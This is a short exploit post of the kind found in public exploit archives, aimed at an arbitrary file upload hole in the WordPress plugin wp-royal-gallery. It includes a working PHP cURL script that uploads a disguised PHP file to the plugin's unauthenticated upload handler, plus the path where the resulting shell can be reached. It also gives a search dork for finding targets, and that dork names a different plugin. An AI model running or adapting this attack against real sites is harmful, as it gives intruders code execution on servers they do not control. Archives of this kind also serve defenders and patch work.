# Exploit Title: Wordpress plugin wp-royal-gallery Arbitrary File Upload Vulnerability
# Date: 21/01/2013
# Author: The Black Devils
# Category : [ webapps ]
# Dork : inurl:wp-content/plugins/wp-image-news-slider
# Type : php
# Tested on: [Windows] & [Ubuntu]
# Download : http://xmlswf.com/images/stories/WP_plugins/wp-royal-gallery.zip
#------------------
<?php
$uploadfile="cyber.php.gif";
$ch = curl_init("http://localhost/wp-content/plugins/wp-royal-gallery/js/swfupload/js/upload.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
Shell Access : http://localhost/[path]/wp-content/uploads/random_name.php.gif
<?php
phpinfo();
?>
#------------------
Contact:
https://www.facebook.com/DevilsDz
https://www.facebook.com/necesarios
#------------------
//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information